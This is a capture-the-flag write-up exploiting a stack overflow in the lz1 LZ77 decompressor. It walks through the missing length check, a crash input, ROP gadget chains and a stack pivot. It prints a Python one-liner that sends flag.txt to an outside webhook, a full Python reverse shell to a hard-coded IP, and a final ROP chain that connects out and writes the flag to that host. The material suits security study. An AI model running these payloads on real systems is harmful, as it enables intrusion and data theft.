Skip to content

lz1

We are provided with the Linux ELF binary lz1 and its source code, lz1.c.

This program is basically copied from https://github.com/andyherbert/lz1, with some very minor changes, such as allocating buffers on the stack using alloca instead of malloc.

As a 12 year old C program, it is not unexpected that bugs (and perhaps vulnerabilities) are present. In fact, some have already been reported.

LZ77 compression

The program implements the lz1 or lz77 compression algorithm.

Instead of storing repeated strings as is, LZ77 stores

  • off: The offset from the current location to the previous occurrence of the string.
  • len: The number of bytes to copy from that location. If the number of bytes to copy is greater than the offset, the algorithm repeats the string until sufficient bytes are copied.

A key implementation detail is the number of bits required to store off and len.

In this version of LZ77, the number of bits used to store off and len must sum to 16.

For example, if 8 bits are used to store off, then LZ77 cannot reference strings output more than 255 bytes ago, and cannot copy more than 256 bytes from previously output strings.

The number of bits used to store len is stored along with the uncompressed length is stored in the header of the compressed data:

c
struct {
    unsigned int uncompressed_size;
    unsigned char num_bits_for_len;
}

Vulnerability

With a rough idea of how LZ77 works, let's explore the decompression function (with some comments added):

c
uint32_t lz77_decompress (uint8_t *compressed_text, uint8_t *uncompressed_text)
{
    uint8_t pointer_length_width;
    uint16_t input_pointer, pointer_length, pointer_pos, pointer_length_mask;
    uint32_t compressed_pointer, coding_pos, pointer_offset, uncompressed_size;

    uncompressed_size = *((uint32_t *) compressed_text); // header.uncompressed_size
    pointer_length_width = *(compressed_text + 4); // header.num_bits_for_len
    compressed_pointer = 5;

    pointer_length_mask = pow(2, pointer_length_width) - 1;

    for(coding_pos = 0; coding_pos < uncompressed_size; ++coding_pos)
    {
        input_pointer = *((uint16_t *) (compressed_text + compressed_pointer));
        compressed_pointer += 2;
        pointer_pos = input_pointer >> pointer_length_width; // Extract `off`
        // Extract `len`. Note that we add 1 as it doesn't make sense to copy 0 bytes.
        pointer_length = pointer_pos ? ((input_pointer & pointer_length_mask) + 1) : 0;  
        if(pointer_pos) // If pointer position is 0, just output the byte normally.
            // Here we copy `pointer_length` bytes from the buffer to output (!!!!)
            for(pointer_offset = coding_pos - pointer_pos; pointer_length > 0; --pointer_length)
                uncompressed_text[coding_pos++] = uncompressed_text[pointer_offset++];
        *(uncompressed_text + coding_pos) = *(compressed_text + compressed_pointer++);
    }

    return coding_pos;
}

Fortunately, the decompression algorithm is much simpler (and shorter) than the compression algorithm.
All it needs to do is read the encoded off and len and copy the bytes into the output buffer.
However, the author neglected to check that copying len bytes into the output won't cause a buffer overflow.

Here's a minimal crashing example (hex encoded, with comments):

c
02 00 00 00 // Report the uncompressed size as 2
08          // equal split between `off` and `len`. Each 1 byte :)
00 00       // Nothing to backreference
61          // Output a
ff 01       // Go back one byte, then duplicate it 256 times

Base64: AgAAAAgAAGH/AQ==

If we debug lz1 in gdb, and attempt to decompress crash.bin using r d crash.bin /dev/null, we would observe a segfault as the program attempts to return from file_lz77_decompress.

Inspecting the stack at the crash site, we find that the return address has indeed been overwritten by aaaaaaaa.

gef> x/xg $rsp
0x7fffffffdc38: 0x6161616161616161

Binary protections and other mitigations

The binary is compiled statically, with PIE disabled. This gives us lots of easily accessible gadgets to work with (or so I thought).

However, NX is enabled, so executing shellcode will be a challenge.

Luckily for us, there is no stack canary used. This mitigation would probably render the challenge unsolvable.

Inspecting run.py, it appears that there is an attempt to disable the STDIN and STDOUT of the lz1 program:

python
subprocess.check_call(["./lz1", "d", input_file.name, output_file.name], stdin=None, stdout=None, stderr=None)

However, upon checking the documentation for subprocess.check_call, we find that None is in fact the default value of stdin, stdout, and stderr:

python
subprocess.check_call(args, *, stdin=None, stdout=None, stderr=None, shell=False, cwd=None, timeout=None, **other_popen_kwargs)

Quoting the documentation,

To suppress stdout or stderr, supply a value of DEVNULL.

This means that we will still be able to read in a secondary payload, or potentially exfiltrate data via stdout.

Exploitation

In theory, the exploitation plan is simple:

  1. Create ROP chain to execute /bin/sh.
  2. Send in the ROP chain at the start of the compressed data.
  3. Report the size of the uncompressed data as the length of the ROP chain + 1.
  4. Use LZ77 pointers to repeat the ROP chain enough times to overflow the buffer.
  5. Start of ROP chain lines up with return address of file_lz77_decompress.
  6. ROP chain is executed.
  7. ???
  8. Profit

Determining offsets

As with any stack buffer overflow exploit, the first step is to figure out the offset between the start of the buffer that is overflowed and the return address we want to overwrite.

This is of course dependent on the length of compressed data that is input, as well as the reported size of the uncompressed data, as alloca calls are made based on these values.

To determine this offset, I set breakpoints in GDB at the start of lz77_decompress (to record the address of the uncompressed_text buffer) and at the return instruction of file_lz77_decompress (to record the return address location).

Based on several rounds of testing, it seems that the offset is quite large (300-400 bytes) if we want to send a payload of significant length (at least 100 bytes).

This means that we will have to use 9 bits for len and 7 bits for off. This limits the length of our ROP chain to 127 bytes (15 full QWORDs), but it allows us to write up to 512 additional bytes, sufficient to overflow the buffer in all cases. Using 8 bits for each would theoretically allow a larger payload, but we might not be able to output enough bytes to actually overflow the buffer.

To simplify future calculations, I decided to fix the input (compressed text) size to 200 bytes. Null bytes can be used to pad the input to 200 bytes, as LZ77 ignores surplus compressed bytes.

This size also ensures that the start of the ROP chain lines up perfectly with the return address of file_lz77_decompress.

python
def encode_pointer_bits(length, position, length_width):
    # Note: higher bits input pos (offset)
    # Lower bits pointer length
    assert length < pow(2, length_width)
    assert position < pow(2, 16-length_width)
    return p16(length + (position << length_width))


CHAIN_LENGTH = 8*15 # Maximum length that can be encoded with 7 bits

def encode_rop_chain(chain):
    assert len(chain) <= CHAIN_LENGTH
    with open("./out1.bin", 'wb') as f:
        f.write(chain)
    os.popen("./lz1 c 9 out1.bin compressed.bin").read()
    compressed = open("./compressed.bin", 'rb').read()
    compressed = compressed[5:]
    return compressed


with open("./out.bin", "wb") as f:
    REQUIRED_PL_LENGTH = 200
    length_width_bits = 9
    rop_chain = p64(0x1337) # TODO!!!
    pl = p32(CHAIN_LENGTH+1) + p8(length_width_bits) # +1 so LZ77 actually processes the pointers
    pl += encode_rop_chain(rop_chain)
    pl += encode_pointer_bits(511, CHAIN_LENGTH, length_width_bits)
    pl = pl + b"\0" * (REQUIRED_PL_LENGTH - len(pl))

    assert len(pl) == REQUIRED_PL_LENGTH

    f.write(pl)

ROP chain

Based on the constraints defined in the previous section, we have 15 QWORDs to work with for our ROP chain. This should be sufficient for a simple execve("/bin/sh", NULL, NULL) ROP chain.

However, despite the large number of gadgets present in lz1, useful gagets are hard to come by. These are some of the gadgets I used:

python
# 0x0000000000423227: pop rdi; add rax, rdi; vzeroupper; ret; 
set_rdi = lambda rdi: p64(0x0000000000423227) + p64(rdi) # Note: pollutes rax
# 0x000000000040266b: pop rcx; ret; 
set_rcx = lambda rcx: p64(0x000000000040266b) + p64(rcx)
# 0x0000000000402777: pop rax; ret; 
set_rax = lambda rax: p64(0x0000000000402777) + p64(rax)
# 0x000000000040d402: pop rsi; pop rbp; ret; 
set_rsi = lambda rsi: p64(0x000000000040d402) + p64(rsi) + p64(0)

# 0x000000000046da97: pop rbx; ret; 
# 0x000000000042f87b: mov rdx, rbx; syscall; 
zero_rdx_and_syscall = p64(0x000000000046da97) + p64(0) + p64(0x000000000042f87b)


# 0x000000000045badc: mov qword ptr [rdi + 0x10], rcx; ret; 
# 0x0000000000453e49: mov qword ptr [rax - 7], rcx; ret; 
def arb_write(where, what):
    return set_rax(where+7) + set_rcx(what) + p64(0x0000000000453e49)

We are thus able to just about fit the ROP chain in 15 QWORDs:

python
writable = 0x00000000004b1000 + 0x200

rop_chain = b""
rop_chain += arb_write(writable, u64(b"/bin/sh\0"))
rop_chain += set_rdi(writable)
rop_chain += set_rax(59)
rop_chain += set_rsi(0)
rop_chain += zero_rdx_and_syscall

For some reason, the ROP chain's position on the stack does not line up nicely with the file_lz77_decompress return address. Thus some rotation of the ROP chain is required to fix this issue:

python
chain_offset = CHAIN_LENGTH - 0x40
chain = chain + b"\0" * (CHAIN_LENGTH - len(chain))
chain = chain[chain_offset:] + chain[:chain_offset]

And with that, we have our local solve:

$ python3 solve1.py          
[*] '/home/kali/Desktop/ctfs/starlabs-1/lz1/lz1'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Opening connection to localhost on port 5000: Done
[*] Switching to interactive mode
 $ cat flag.txt
Test flag
$

Remote exploit

Unfortunately, rerunning the exploit on the remote service results in an error:

[+] Opening connection to 159.223.33.156 on port 9101: Done
[*] Switching to interactive mode
 Command '['./lz1', 'd', '/tmp/tmpu10c6slk', '/tmp/tmph7qpu4ob']' returned non-zero exit status 127.
[*] Got EOF while reading in interactive

The exit status 127 indicates that the file was not found. It is odd, but certainly possible that the remote doesn't have /bin/sh. Perhaps it was moved to another location.

From the presence of run.py, we can be pretty sure that python is installed on the remote. In a typical python docker container, python is installed to /usr/local/bin/python3.

This path is way too long for current ROP chain. We can barely fit the 8 byte /bin/sh\0!

Luckily, as stdin remains open, we can simply read in and execute a secondary ROP chain. To do this, we will need a copy of new gadgets:

python
# 0x000000000040321d: pop rsp; ret; 
set_rsp = lambda rsp: p64(0x000000000040321d) + p64(rsp)

# 0x0000000000416116: syscall; ret; 
syscall_ret = p64(0x0000000000416116)

# 0x000000000047e364: pop rdx; or al, 0x5b; pop r12; pop rbp; ret; 
set_rdx = lambda rdx: p64(0x000000000047e364) + p64(rdx) + p64(0) + p64(0)

We'll modify our original ROP chain to:

python
rop_chain += set_rsi(writable)
rop_chain += set_rdx(0x1337)
rop_chain += set_rax(0)
rop_chain += syscall_ret
rop_chain += set_rsp(writable)

This just sets up a read to the writable region in the binary's BSS section.

The execve syscall and its associated setup is moved our secondary ROP chain:

python
rop_chain = b""
cmd = b"/usr/local/bin/python3"
L = 24
assert len(cmd) <= L
cmd += b"\0" * (L-len(cmd))
rop_chain += arb_write(writable+0x100, u64(cmd[:8]))
rop_chain += arb_write(writable+0x108, u64(cmd[8:16]))
rop_chain += arb_write(writable+0x110, u64(cmd[16:]))
rop_chain += set_rdi(writable+0x100)
rop_chain += set_rax(59)
rop_chain += set_rsi(0)
rop_chain += zero_rdx_and_syscall

With a basically unrestricted write into the BSS section, we can afford to encode the entire path to the python executable.

All that's left is a simple python payload to exfiltrate the flag:

python
__import__("urllib.request").request.urlopen("https://h.jro.sg/?"+open('flag.txt', 'rb').read().hex()).read() or exit()

We receive the flag, hex encoded on our webhook:

GET /?535441527b6e6f775f74696d655f746f5f72656372656174655f626c617374706173735f386435396261393839387d0a0a28506c6561736520696e636c756465207468697320666c6167207768656e207375626d697474696e6720796f75722077726974657570290a

This decodes to:

STAR{now_time_to_recreate_blastpass_8d59ba9898}

(Please include this flag when submitting your writeup)

It is possible to get a reverse shell using

python
exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("103.149.46.88",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")')

Using this reverse shell, I found that /bin/sh is actually a symlink to /bin/busybox, which is probably why the original exploit didn't work.

Intended solution

In the unintended solution, we used the read syscall to load a secondary payload without size restrictions.

However, with stdin disabled, we need to find somewhere else to store it. This payload will be much larger, as we won't be able to use stdout to print the flag, or use stdin to read a tertiary payload. Instead, we will have to exfiltrate it using a raw TCP socket.

In fact, this secondary payload is so large, that the number of bits used to represent len had to be increased to 10 (max length of 1024)!

The only remaining possible location is at the end of the compressed data, after our malformed backreference/pointer. This won't be processed by LZ77, but it will still be read into memory.

As fread is used to open the input file, a copy of its contents is stored in the heap. Thus, while the input data on the stack might have been overwritten by our buffer overflow exploit, our secondary payload on the heap remains intact.

Unfortunately, addresses in the heap are randomized, and with no way to get an infoleak, this approach seems impossible.

rsp control

However, looking closer at the registers at the return instruction of file_lz77_decompress, we find that r10 points into the heap! While it doesn't intersect the input file data, it's only a couple hundred bytes off.

I found a pair of gadgets that loads r10 into rax, where it can be subsequently manipulated:

py
# 0x0000000000407a41: mov rax, r10; ret; 
# 0x00000000004234bb: add rax, rdi; ret; 
get_heap_addr = lambda offset: p64(0x0000000000407a41) + set_rdi(offset) + p64(0x00000000004234bb)

Now, we just need to find a way to set rsp to rax. Unfortunately, though not unexpectedly, there isn't any mov rsp, rax gadget.

There is an xchg esp, eax; ret gadget at 0x0000000000430a0a, but that only exchanges the lower 32 bits. Leaving the upper 32 bits unmodified. Right?

Well, as it turns out, xchg esp, eax actually zeros the upper 32 bits of each register!

asm
mov rax, 0x1337133713371337
mov rbx, 0xdeadbeefdeadbeef
xchg eax, ebx
; rax = 0xdeadbeef
; rbx = 0x13371337

This is incredibly helpful, as the heap address just fits into 32 bits.

The offset between the value of r10 and the heap location of the input file is dependent on the size of input. After some debugging, I found that this offset was 0x21c for a payload size of max 600 bytes.

python
# 0x0000000000407a41: mov rax, r10; ret; 
# 0x00000000004234bb: add rax, rdi; ret; 
get_heap_addr = lambda offset: p64(0x0000000000407a41) + set_rdi(offset) + p64(0x00000000004234bb)

# 0x0000000000430a0a: xchg esp, eax; ret; 
ret_rax = p64(0x0000000000430a0a)

rop_chain = b""
rop_chain += get_heap_addr(0x21c)
rop_chain += ret_rax

This tiny ROP chain occupies 48 of the 63 bytes available.

Secondary ROP chain

The secondary ROP chain closely follows typical reverse shell shellcode:

python
def do_syscall(number, *args):
    assert len(args) <= 3
    pl = b""
    if args:
        pl += set_rdi(args[0])
    if len(args) > 1:
        pl += set_rsi(args[1])
    
    if len(args) > 2:
        pl += set_rdx(args[2])

    pl += set_rax(number)
    pl += syscall
    return pl

pl += do_syscall(41, 2, 1, 0) # socket(2,1,0) = 3
ip = "103.149.46.88"
ip_int = sum(int(x) * pow(2, i*8) for i,x in enumerate(ip.split(".")))
port = 1337
port = ((port &0xff) << 8) + (port >> 8)
pl += arb_write(writable, (2 + (port << 16)) + (ip_int << 32))
pl += do_syscall(42, 3, writable, 16) # connect(3, sock_addr, 16)
pl += arb_write(writable+16, u64(b"flag.txt"))
pl += do_syscall(2, writable + 16, 0, 0) # open("flag.txt", 0, 0) = 4
pl += do_syscall(0, 4, writable + 0x20, 0x100) # read(4, buf, 0x100)
pl += do_syscall(1, 3, writable + 0x20, 0x100) # write(3, buf, 0x100)

I hardcoded the fds, but I'm sure you could find some gadgets to move the raxs to the rdis.

After setting up a TCP listener and running the exploit, we receive the flag:

~$ nc -nvlp 1337
Listening on 0.0.0.0 1337
Connection received on 159.223.33.156 43588
STAR{now_time_to_recreate_blastpass_8d59ba9898}

(Please include this flag when submitting your writeup)